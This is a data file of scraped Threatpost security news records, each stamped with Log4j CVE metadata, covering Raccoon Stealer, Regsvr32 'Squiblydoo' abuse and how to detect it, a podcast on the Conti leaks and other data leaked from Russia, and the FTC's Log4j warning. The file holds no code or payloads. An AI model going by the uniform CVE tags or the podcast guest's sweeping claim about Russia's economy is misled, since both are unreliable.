Stealer.\n\n## **Avoiding Russian Entities**\n\nOnce executed, Racoon Stealer starts checking for the default user locale set on the infected device and won\u2019t work if it\u2019s one of the following: Russian, Ukrainian, Belarusian, Kazakh, Kyrgyz, Armenian, Tajik or Uzbek. This is likely because the developers themselves are Russian, researchers believe.\n\nHowever, Avast Threat Labs found that in recent activity, \u201cthe country where we have blocked the most attempts is Russia, which is interesting because the actors behind the malware don\u2019t want to infect computers in Russia or Central Asia,\u201d Martyanov wrote.\n\nThis could be because \u201cthe attacks spray and pray, distributing the malware around the world,\u201d he noted. The malware doesn\u2019t check for the location of the user until it actually reaches a device; if it finds that the device is located in a region developers don\u2019t want to target, it won\u2019t run.\n\n\u201cThis explains why we detected so many attack attempts in Russia; we block the malware before it can run, i.e. before it can even get to the stage where it checks for the device\u2019s locale,\u201d Martyanov wrote. \u201cIf an unprotected device that comes across the malware with its locale set to English or any other language that is not on the exception list but is in Russia, it would still become infected.\u201d\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-11T15:03:20", "type": "threatpost", "title": "Raccoon Stealer Crawls Into Telegram", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-11T15:03:20", "id": "THREATPOST:65F4E74D349524EBAC2DA4A4ECF22DD8", "href": "https://threatpost.com/raccoon-stealer-telegram/178881/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-09T22:25:28", "description": "A Windows living-off-the-land binary ([LOLBin](<https://threatpost.com/cybersecurity-failing-ransomware/175637/>)) known as Regsvr32 is seeing a [big uptick](<https://github.com/uptycslabs/IOCs/tree/main/Attacker%20increasingly%20adopting%20Squiblydoo%20technique%20via%20office%20documents>) in abuse of late, researchers are warning, mainly spreading trojans like Lokibot and Qbot.\n\nLOLBins are legitimate, native utilities used daily in various computing environments, that cybercriminals use to evade detection by blending in to normal traffic patters. In this case, Regsvr32 is aMicrosoft-signed command line utility in Windows that allows users to register and unregister libraries. By registering a .DLL file, information is added to the central directory (the Registry) so that it can be used by Windows and shared among programs.\n\nThis long reach is catnip to cyberattackers, who can abuse the utility via the [\u201cSquiblydoo\u201d technique](<https://car.mitre.org/analytics/CAR-2019-04-003/>), Uptycs researchers warned.\n\n\u201cThreat actors can use Regsvr32 for loading COM scriptlets to execute DLLs,\u201d they explained in a [Wednesday writeup](<https://www.uptycs.com/blog/attackers-increasingly-adopting-regsvr32-utility-execution-via-office-documents>). \u201cThis method does not make changes to the Registry as the COM object is not actually registered, but [rather] is executed. This technique [allows] threat actors to bypass application whitelisting during the execution phase of the attack kill chain.\u201d\n\n## **The .OCX Connection**\n\nMalicious use of Regsvr32 has been cresting of late in the Uptycs telemetry, researchers warned, with cybercrooks specifically attempting to register .OCX files in the Registry via various types of malicious Microsoft Office documents. As a class, .OCX files contain ActiveX controls, which are code blocks that Microsoft developed to enable applications to perform specific functions, such as displaying a calendar.\n\n\u201cThe Uptycs Threat Research team has observed more than 500+ malware samples using Regsvr32.exe to register [malicious] .OCX files,\u201d researchers warned. \u201cDuring our analysis of these malware samples, we have identified that some of the malware samples belonged to [Qbot](<https://threatpost.com/revamped-qbot-trojan-packs-new-punch-hijacks-email-threads/158715/>) and [Lokibot](<https://threatpost.com/cisa-lokibot-stealer-resurgence/159495/>) attempting to execute .OCX files\u202697 percent of these samples belonged to malicious Microsoft Office documents such as Excel spreadsheet files.\u201d\n\nMost of the Microsoft Excel files observed in the attacks carry the .XLSM or .XLSB suffixes, they added, which are types that contain embedded macros. During the attack, these usually download or execute a malicious payload from the URL using the formulas in the macros.\n\nSimilarly, some campaigns use Microsoft Word, Rich Text Format data or Composite Document (.DOC, .DOCX or .DOCM files embedded with malicious macros, according to Uptycs.\n\n## **Identifying Suspicious regsvr32 Executions**\n\nBecause Regsvr32, like other LOLBins, is used for legitimate daily operations, its abuse often evades traditional cybersecurity defenses. However, researchers noted that security teams can monitor for a couple of specific behaviors in order to track its activity:\n\n * Look for parent/child process relationships where Regsvr32 is executed with parent process of Microsoft Word or Microsoft Excel;\n * And, it can be identified by looking for Regsvr32 executions that load the scrobj.dll, which executes a COM scriptlet.\n\n**_Check out our free _**[**_upcoming live and on-demand online town halls_**](<https://threatpost.com/category/webinars/>) **_\u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-09T21:56:49", "type": "threatpost", "title": "Cybercriminals Swarm Windows Utility Regsvr32 to Spread Malware", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-09T21:56:49", "id": "THREATPOST:8D57BD39C913E8DDC450DD9EF2564C2C", "href": "https://threatpost.com/cybercriminals-windows-utility-regsvr32-malware/178333/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-04T03:51:25", "description": "Information about nuclear plants and air force capabilities. Conti ransomware gang crooks [conjecturing](<https://krebsonsecurity.com/2022/03/conti-ransomware-group-diaries-part-i-evasion/>) that the National Security Agency (NSA) was maybe behind the mysterious, months-long [TrickBot](<https://threatpost.com/trickbot-amazon-paypal-top-brands/178483/>) [lull](<https://threatpost.com/trickbot-break-researchers-scratching-heads/178678/>). [Doxxed data](<https://www.theregister.com/2022/03/02/russian_soldier_leaks/>) about 120K Russian soldiers.\n\nThose are just some of the sensitive, valuable data that\u2019s being hacked out of Russia in the [cyber war zone](<https://threatpost.com/ukraine-russia-cyber-warzone-splits-cyber-underground/178693/>) \u2013 a war that erupted [even before](<https://threatpost.com/microsoft-ukraine-foxblade-trojan-hours-before-russian-invasion/178702/>) the country invaded Ukraine.\n\n\u201cEveryone is so focused on Russia hacking the world, but the world has been hacking Russia\u2026. And dumping a lot of critical data on military, nuclear plants, etc.,\u201d said Vinny Troia, cybersecurity Ph.D. and founder of [ShadowByte](<https://shadowbyte.com/>), a dark web threat intelligence and cyber fraud investigations firm.\n\nHe\u2019s one of an untold number of experts on dark-web threat intelligence who\u2019ve been pouring over the intel that\u2019s been flooding out of practically every nook and cranny of the internet: data that\u2019s being posted on Twitter, Telegram and within the multiple dumps of insider knowledge about the Conti ransomware gang posted by the Ukrainian supporter ContiLeaks.\n\n\n\n(Brought to you by SpecOps. Underwriters of Threatpost podcasts do not assert any editorial control over content.)\n\nThat ongoing dump, which has included [source code](<https://threatpost.com/conti-ransomware-decryptor-trickbot-source-code-leaked/178727/>) for Conti and TrickBot, a decryptor (that doesn\u2019t help recent victims whose files have been encrypted by the Conti gang, unfortunately), and much more, stopped yesterday when the Conti gang shut down its Jabber servers, Troia told Threatpost on Wednesday.\n\nHe visited the Threatpost podcast to update us on the mountain of data about Russia that intelligence experts are now slogging through.\n\nYou can download the podcast below or [listen here](<http://traffic.libsyn.com/digitalunderground/030222_Vinny_Troia_mixdown.mp3>). For more podcasts, check out Threatpost\u2019s [podcast site](<https://threatpost.com/microsite/threatpost-podcasts-going-beyond-the-headlines/>). Also, see below for a lightly edited transcript. \n\n\n## Lightly Edited Transcript\n\n**Lisa Vaas:** Listeners, welcome to the Threatpost podcast. My guest today is Vinny Troia, cybersecurity PhD and founder of ShadowByte, a dark web threat intelligence and cyber fraud investigations firm. Today, we\u2019re going to focus on all of the data that\u2019s being leaked on Russia as a result of its invasion of Ukraine.\n\n**Lisa Vaas:** Thanks for coming on the podcast. Vinny, before we jump in, could you give us a bit of your background, please?\n\n**Vinny Troia:** Sure. Thanks for having me. Yes. So my background I come from a DOD background did a lot of work for surface deployment command. And yeah, I was there for about, I think six or seven years before moving over to private sector.\n\n**Vinny Troia:** And while I was there, I did a lot of work in compliance and random security hacking projects, a lot of red teaming, pen testing. And then eventually I started my own firm. Fast forward to today, our focus now is primarily dealing with a lot of ransomware cases, incident response, and we do a lot of ransom negotiations as well.\n\n**Vinny Troia:** We\u2019re constantly focused on dark web threat actors and any of the players, really.\n\n**Lisa Vaas:** Thank you for that. And well this past week must be just a flurry with the dark web activity around Ukraine and Russia. So in an email, you were talking about how everyone is so focused on Russia hacking the world, but the world has been also hacking Russia and dumping a lot of critical data on military nuclear plants, etc.\n\n**Lisa Vaas:** Where is your Intel coming from? Are there any forums in particular that you\u2019re clued into or is that something you can\u2019t even discuss?\n\n**Vinny Troia:** it\u2019s not even like that. It\u2019s a, I mean, it\u2019s literally everywhere. I mean, there\u2019s Telegram channels. I mean, some is just being pasted right on Twitter.\n\n**Vinny Troia:** I mean, it\u2019s literally coming from all angles at this point.\n\n**Lisa Vaas:** Well, tell me what you\u2019re seeing.\n\n**Vinny Troia:** I\u2019d say last month, there was a lot of data coming out about Ukrainian citizens. I mean, a lot. So that was kind of interesting, almost like a precursor to what was happening.\n\n**Vinny Troia:** And now it\u2019s almost like, the rest of the world that\u2019s really pissed and started hacking back and you\u2019re seeing so much data coming out. I\u2019m actually looking for sorry, as we speak, I\u2019m going through some of this data. I mean, there\u2019s stuff on a nuclear plants, some of their air force capabilities.\n\n**Vinny Troia:** There\u2019s another database that I just recently came across that is about a hundred thousand of their military members with photos, passport numbers, things like that. I mean, it\u2019s really just data coming from all depths of. From other infrastructure,\n\n**Lisa Vaas:** well, who, who, who is the primary sources?\n\n**Lisa Vaas:** I mean, I know that anonymous of course has jumped in to, to, to wage war on behalf of Ukraine, cyber war on behalf of Ukraine. And I know that you can put out a call for help from cyber experts on this too. So who, who exactly is, is. Hacking this stuff out of Russia.\n\n**Vinny Troia:** I mean, I, honestly, I couldn\u2019t tell you, I mean, it\u2019s coming, like I said, it\u2019s coming from all sorts of places.\n\n**Vinny Troia:** Right. And when things get leaked, I mean, they just get leaked from various [sources\u2019] usernames on forums or Telegram channels. And so you never really know who it\u2019s coming from. It is interesting that the world kind of banded together against this. And Russia was supposed to have this big cyber arsenal against them.\n\n**Vinny Troia:** And it\u2019s really funny that Joe Biden didn\u2019t mention security once in the state of the union last night, being that it was such a big deal and everybody\u2019s been talking about it.\n\n**Lisa Vaas:** Yeah. And, and I remember it was an NBC news last week or, or was reporting on the big cyberattacks, the major offensive cyberattacks that were being discussed at the White House, but then the White House denied [considering offensive cyberattacks].\n\n**Vinny Troia:** The news has been all about cyberattacks and Russia\u2019s capabilities and it\u2019s such a priority, but it just wasn\u2019t even mentioned once. I just, I find that really strange, but regardless, it\u2019s nice that the world kind of banded together to really come after Russia. One of the most, honestly, just incredibly fascinating things is all these leaks that have been occurring regarding the Conti ransomware. Yes. And they\u2019re arguably the largest or at least one of the top few largest ransomware groups in the world. And I mean, they\u2019re just having everything leak: source code, recovery, keys, chat logs.\n\n**Vinny Troia:** I mean, as early, as recently as today with the most recent chat logs that came out, so somebody still has access to their servers and I haven\u2019t even had a chance to read the ones from today.\n\n**Lisa Vaas:** I just wrote up the second dump and I didn\u2019t even know there was more posted today. It\u2019s so hard to keep up. Can we talk a little bit about those dumps? Now as I understand it, it\u2019s the decryptor for version two of the Conti Lock ransomware software [that was leaked]. That\u2019s not even going to be usable to anybody because it was for an older version.\n\n**Lisa Vaas:** How is this going to affect Conti? Another one of my sources was telling me that just one of the gang\u2019s groups got hit by this [leak] and everybody else is pretty much doing fine. They\u2019re carrying on business as usual.\n\n**Vinny Troia:** I think what\u2019s really interesting. And they talked about this in one of the, in some of the logs. So Conti uses, or used, this one piece of software called TrickBot in order to disseminate and \u2026 one of the or groupings of the chat log showed that the NSA came after TrickBot specifically.\n\n**Vinny Troia:** I don\u2019t know whether or not they reverse engineered or what they did, but I mean, they were able to shut it down for a couple of weeks just by changing patch numbers and uploading them to a server that would accept the changes. And so what they did was they maxed out the maximum patch number.\n\n**Vinny Troia:** The software couldn\u2019t take any new updates at that point. So they effectively shut it down for a little bit. That was actually really amazing.\n\n**Lisa Vaas:** I totally missed that. Which repository was that in? What\u2019s the name of the repository?\n\n**Vinny Troia:** It\u2019s all JSON files.\n\n**Lisa Vaas:** Everybody knew that TrickBot pretty much shut down for a few months, but I didn\u2019t know that about the NSA piece.\n\n**Vinny Troia:** It\u2019s presumed to be the NSA, given the level of skill that was involved, we\u2019ll call it finesse. I would say it would have to be some government agency.\n\n**Lisa Vaas:** Was there chatter about the shutdown?\n\n**Vinny Troia:** Yeah, it\u2019s basically a handful of officials talking about it and how they were shut down and how they basically had to rebuild their infrastructure.\n\n**Vinny Troia:** They were down for a little bit and eventually they came back, but it just shows that they were being targeted by nation states. I think the most interesting thing is, if this really is a Russian operated group, which is what it seems like, then the fact that all these files are being leaked, whether it\u2019s from an insider or somebody who\u2019s a researcher who\u2019s attacking them specifically, I think this is going to have a major toll on Russia\u2019s finances, especially considering this is a group that is averaging what, a couple hundred million dollars a year recurring revenue?\n\n**Lisa Vaas:****** I don\u2019t expect you to know this, but maybe you do: How much of Russia\u2019s economy is actually coming from ransomware or other malware?\n\n**Vinny Troia:** I think the majority, actually. So I think the majority of Russia\u2019s economy is coming from some sort of crime. There\u2019s not a whole lot going on over there. It\u2019s like a big wasteland,\n\n**Lisa Vaas:** Right. The underground members say \u201cprotect the motherland, the motherland protects you. \u201cExcept for when they need some stooges to arrest, some low-level stooges to make the U.S. happy, which happened recently.\n\n**Vinny Troia: **As far as the decryptor [goes], you\u2019re correct. It is for an older version. I think I saw some keys floating around as well, but new code is written on top of old code and it\u2019s not like it was replaced completely. So I would imagine that there will be some fallout from that code base.\n\n**Lisa Vaas:** Yeah, there\u2019s a lot of code to go through. I hear. So what were some other really great finds in the intelligence that we\u2019re getting out of Russia during this crisis?\n\n**Vinny Troia:** It\u2019s information on citizens, it\u2019s information on military members. I\u2019ve seen things on nuclear plants. I can\u2019t speak to what can be done with all of it, honestly, but the point is it\u2019s there and, in the right hands, I\u2019m sure it could be pretty useful.\n\n**Lisa Vaas:** I assume, during these days, it\u2019s just not going to let up.\n\n**Vinny Troia:** No, and like I said, a couple of hours ago we had more leaks from their Jabber server. So I would imagine whoever has access has been able to pull off a lot, and I think [Conti] actually just shut it down finally.\n\n**Lisa Vaas:** So that means they they shut down Jabber. That doesn\u2019t mean that they figured out who the leaker is. Right?\n\n**Vinny Troia:** The person leaking it goes by [ContiLeaks]. But whether or not he\u2019s the one with access, I don\u2019t know. But the point is they figured out that somebody did have access to their Jabber logs. So now they\u2019ve moved servers.\n\n**Lisa Vaas:** Well, awesome. What else can you tell listeners? What can you leave us with?\n\n**Vinny Troia:** I would say that, just because Conti\u2019s out doesn\u2019t mean that the problem is going away anytime soon. So be diligent and keep up with your passwords and make sure that you actually have fresh passwords, because looking at these logs and how they\u2019re getting into a lot of these systems, it\u2019s just using other people\u2019s recycled passwords.\n\n**Vinny Troia:** The hacks they\u2019re using aren\u2019t even that sophisticated. And I mean, even now the majority of hacks are still caused by reused passwords.\n\n**Lisa Vaas:** We can get some intelligence out of the exploits that they\u2019re targeting. I think I saw Zerologin was mentioned as one, and of course we know a lot about their tooling right now. Like the whole Cobalt Strike beacon thing.\n\n**Vinny Troia:** Cobalt Strike\u2019s been a red teaming tool forever. It\u2019s a staple. For pen testers, it\u2019s an amazing tool. And so the fact that they were using it isn\u2019t really a surprise.\n\n**Lisa Vaas:** Well, is there anything surprising that was found in the dumps? I know that we\u2019ve got email addresses of some of the members of the gang.\n\n**Vinny Troia:** You can use that to look for other accounts and potentially start to reverse back to maybe who they are. But I mean, there\u2019s so much information here. I haven\u2019t even gone through maybe a 10th of it. It\u2019s coming up too fast. It\u2019s a full-time job. It takes a full-time team at this point to go through all of this. Because then there was another thing that came out: rocket chat logs from a rocket chat. There\u2019s thousands of logs here.\n\n**Lisa Vaas:** Yeah, that\u2019s pretty bad. When you\u2019ve got a researcher, an intel expert who says he\u2019s getting too much: The firehouse is open so wide. So the takeaways for listeners are that these leaks haven\u2019t stopped, and we don\u2019t even know how many that [ContiLeaks] is promising.\n\n**Vinny Troia:** I mean, the fact that today\u2019s leaks caused the shutdown, I presume caused a shut down of their Jabber server. I\u2019m going to say that well has pretty much run dry. I don\u2019t know what else is going to be released in terms of tools, but I\u2019d say all of this has probably put a dent in everything they\u2019re doing for a little bit.\n\n**Lisa Vaas:** We can hope so, but I don\u2019t think we should assume anything. And that\u2019s what you\u2019re telling us: They\u2019re still going to be active and they\u2019re going to retool anyway. Right. And will resurface.\n\n**Vinny Troia:** Yeah. I was going to say, giving credit to [security journalist Brian] Krebs on this one, one of the things he reported on was that there was a conversation, and I haven\u2019t even made it to the set about how the ransomware groups were being investigated.\n\n**Vinny Troia:** And someone high up in the group basically told them they didn\u2019t have anything to worry about. The investigation was going to go off of them. And that was right around the time that Russia took down REvil. So it was interesting. It\u2019s almost like they had insider information, or maybe they literally were working for [Russia].\n\n**Lisa Vaas:** I think REvil. that takedown, was the one I was thinking about when I alluded to this kind of token law enforcement action on Russia\u2019s part to maybe make the U.S. shut up. Now I have to go read Brian Krebs. Why didn\u2019t I read Brian Krebs earlier today? I have to do that. That\u2019s like a requirement of the job. OK, well, Vinnie, unless you\u2019ve got anything else to add, I\u2019m going to let you go.\n\n**Vinny Troia:** No, all good.\n\n**Lisa Vaas:** I appreciate it. Thank you so much. Thanks for coming on the podcast.\n\n030322 10:49 UPDATE: ContiLeaks, the source of the Conti leaks, is not believed to be the same entity as vx_underground, which has disseminated the leaked files.\n\nRegister Today for [**Log4j Exploit: Lessons Learned and Risk Reduction Best Practices**](<https://bit.ly/3BXPL6S>) \u2013 a LIVE **Threatpost event** sked for Thurs., March 10 at 2PM ET. Join Sonatype code **expert Justin Young** as he helps you sharpen code-hunting skills to reduce attacker dwell time. Learn why Log4j is still dangerous and how SBOMs fit into software supply-chain security. [Register Now for this one-time FREE event](<https://bit.ly/3BXPL6S>), Sponsored by Sonatype. \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-03T16:31:36", "type": "threatpost", "title": "Russia Leaks Data From a Thousand Cuts\u2013Podcast", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-03T16:31:36", "id": "THREATPOST:6C547AAC30142F12565AB289E211C079", "href": "https://threatpost.com/russia-leaks-data-thousand-cuts-podcast/178749/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-05T19:44:48", "description": "The Federal Trade Commission (FTC) will muster its legal muscle to pursue companies and vendors that fail to protect consumer data [from the risks of](<https://threatpost.com/microsoft-rampant-log4j-exploits-testing/177358/>) the Log4j vulnerabilities, it [warned](<https://www.ftc.gov/news-events/blogs/techftc/2022/01/ftc-warns-companies-remediate-log4j-security-vulnerability>) on Tuesday.\n\n\u201cThe FTC intends to use its full legal authority to pursue companies that fail to take reasonable steps to protect consumer data from exposure as a result of Log4j, or similar known vulnerabilities in the future,\u201d according to the warning.\n\nThose companies that bungle consumer data, leaving vulnerabilities unpatched and thus opening the door to exploits and the resulting possible \u201closs or breach of personal information, financial loss and other irreversible harms,\u201d are risking consequences tied to weighty laws that have resulted in fat fines, the FTC said.\n\nIt mentioned, among others, the [Federal Trade Commission Act ](<https://www.ftc.gov/enforcement/statutes/federal-trade-commission-act>) and the [Gramm-Leach-Bliley Act](<https://threatpost.com/privacy-regulation-could-be-a-test-for-states-rights/138303/>). The FTC Act, the commission\u2019s primary statute, enables it to seek monetary redress and other relief for conduct injurious to consumers. [Gramm-Leach-Bliley](<https://www.ftc.gov/tips-advice/business-center/privacy-and-security/gramm-leach-bliley-act>) requires financial institutions to safeguard sensitive data.\n\n\u201c It is critical that companies and their vendors relying on Log4j act now, in order to reduce the likelihood of harm to consumers, and to avoid FTC legal action,\u201d the FTC urged.\n\nThe FTC means it: Its warning included a reference to the complaints against Equifax, which agreed to pay $700 million to settle actions by the FTC, the Consumer Financial Protection Bureau, and all fifty states over its infamous [2017 data leak](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>) (consumers\u2019 reaction at the time: [Make it hurt more](<https://threatpost.com/200k-sign-petition-against-equifax-data-breach-settlement/148560/>)).\n\nAccording to the Equifax complaint, its failure to patch a known vulnerability \u201cirreversibly exposed the personal information of 147 million consumers.\u201d Expect more of the same if your company fails to protect consumer data from exposure as a result of Log4Shell or whatever similar, known vulnerabilities crop up, it said.\n\nThe FTC advised companies to use [guidance](<https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance>) from the Cybersecurity and Infrastructure Security Agency (CISA) to check if they\u2019re using Apache\u2019s Log4j logging library, which is at the heart of the cluster of vulnerabilities known as [Log4Shell](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>).\n\nCompanies that find that they are using Log4j should do the following, CISA recommended:\n\n * Update your Log4j software package to the [most current version](<https://logging.apache.org/log4j/2.x/security.html>).\n * Consult [CISA guidance](<https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance>) to mitigate this vulnerability.\n * Ensure remedial steps are taken to ensure that your company\u2019s practices do not violate the law. Failure to identify and patch instances of this software may violate [the FTC Act](<https://www.ftc.gov/enforcement/statutes/federal-trade-commission-act>).\n * Distribute this information to any relevant third-party subsidiaries that sell products or services to consumers who may be vulnerable.\n\nOn Dec. 17, CISA issued an [emergency directive](<https://www.cisa.gov/uscert/ncas/current-activity/2021/12/17/cisa-issues-ed-22-02-directing-federal-agencies-mitigate-apache>) mandating federal civilian departments and agencies to immediately patch their internet-facing systems for the Log4j vulnerabilities by Thursday, Dec. 23. Federal agencies were given five more days \u2013 until Dec. 28 \u2013 to report Log4Shell-affected products, including vendor and app names and versions, along with what actions have been taken \u2013 e.g. updated, mitigated, removed from agency network \u2013 to block exploitation attempts.\n\nCISA provides a [dedicated page](<https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance>) for the Log4Shell flaws with patching information and has released a [Log4j scanner](<https://twitter.com/cisagov/status/1473401212468932609?s=12>) to hunt down potentially vulnerable web services.\n\n## The Log4j Fire Rages Unabated\n\nThe initial flaw \u2013 [CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>) \u2013 was discovered on Dec. 9 and came under attack within hours. As of Dec. 15, more than 1.8 million attacks, against [half of all corporate networks](<https://threatpost.com/log4j-attacks-state-actors-worm/177088/>), using at least 70 distinct malware families, had already been launched to exploit what became a trio of bugs:\n\n 1. The Log4Shell remote-code execution (RCE) bug that spawned [even nastier mutations](<https://threatpost.com/apache-log4j-log4shell-mutations/176962/>) and which led to \u2026\n 2. The [potential for denial-of-service](<https://threatpost.com/apache-patch-log4shell-log4j-dos-attacks/177064/>) (DoS) in Apache\u2019s initial patch. Plus, there was \u2026\n 3. [A third bug](<https://threatpost.com/third-log4j-bug-dos-apache-patch/177159/>), a DoS flaw similar to Log4Shell in that it also affected the logging library. It differed in that it concerned Context Map lookups, not the Java Naming and Directory Interface (JNDI) lookups to an LDAP server involved in CVE-2021-44228: lookups that allow attackers to execute any code that\u2019s returned in the Log4Shell vulnerability.\n\nAt this point, the Conti ransomware gang has had a [full attack chain](<https://threatpost.com/conti-ransomware-gang-has-full-log4shell-attack-chain/177173/>) in place for weeks.\n\nIn a Monday update, Microsoft said that the end of December [brought no relief](<https://threatpost.com/microsoft-rampant-log4j-exploits-testing/177358/>): The company observed state-sponsored and cyber-criminal attackers probing systems for the Log4Shell flaw through month\u2019s end. \u201cMicrosoft has observed attackers using many of the same inventory techniques to locate targets. Sophisticated adversaries (like nation-state actors) and commodity attackers alike have been observed taking advantage of these vulnerabilities. There is high potential for the expanded use of the vulnerabilities,\u201d Microsoft security researchers warned.\n\n\u201cExploitation attempts and testing have remained high during the last weeks of December. We have observed many existing attackers adding exploits of these vulnerabilities in their existing malware kits and tactics, from coin miners to hands-on-keyboard attacks,\u201d the researchers said.\n\n## Hunting Down Log4j\n\nOne of the most challenging aspects of responding to the Log4j vulnerability is simply identifying the devices in an organization where Log4j is used. The word \u201cubiquitous\u201d has applied since the get-go.\n\n\u201cSince it is a cross-platform, widely used software library, there is incredible diversity in where and how it is deployed: it can be an application package installed by itself, bundled with another application package as just another file on disk or embedded in another application with no visible artifact,\u201d J.J. Guy, co-founder and CEO at Sevco Security, told Threatpost on Wednesday.\n\nHe added, \u201cEven worse, it is used in everything from cloud-managed services to server applications and even fixed-function, embedded devices. That internet-connected toaster is very likely vulnerable to Log4Shell.\u201d\n\nWe\u2019re just in the middle of the triage phase now, Guy said, where basic tools like systems-management or software-management tools to check for the file on disk can provide initial triage.\n\nOne question: What\u2019s the inventory of equipment that still needs to be triaged?\n\n\u201cFor organizational leaders, such as the board, CEO, CIO or CISO, to have confidence in those triage results requires they report not only the machines that have been triaged but also how many are pending triage,\u201d Guy remarked. \u201cReporting the \u2018pending triage\u2019 statistic requires a complete asset inventory, including which machines have been successfully triaged.\u201d\n\nHe called this \u201cone of the larger hidden challenges\u201d in every organization\u2019s response, given that so few have a comprehensive asset inventory, \u201cdespite the fact it has been a top requirement in every security compliance program for decades.\u201d\n\n[_Image courtesy of Quince Media._](<https://commons.wikimedia.org/wiki/File:3D_illustration_image_of_a_gavel_-_auction_hammer_-_free_to_use_in_your_projects_07.jpg>) [_Licensing details_](<https://creativecommons.org/licenses/by-sa/4.0/>)_. \n__ _ \n_**Password** **Reset: ****[On-Demand Event](<https://threatpost.com/webinars/password-reset-claiming-control-of-credentials-to-stop-attacks/>):** Fortify 2022 with a password-security strategy built for today\u2019s threats. This [Threatpost Security Roundtable](<https://threatpost.com/webinars/password-reset-claiming-control-of-credentials-to-stop-attacks/>), built for infosec professionals, centers on enterprise credential management, the new password basics and mitigating post-credential breaches. Join Darren James, with Specops Software and Roger Grimes, defense evangelist at KnowBe4 and Threatpost host Becky Bracken. **[Register & stream this FREE session today](<https://threatpost.com/webinars/password-reset-claiming-control-of-credentials-to-stop-attacks/>)** \u2013 sponsored by Specops Software._\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-05T19:00:03", "type": "threatpost", "title": "FTC to Go After Companies that Ignore Log4j", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": 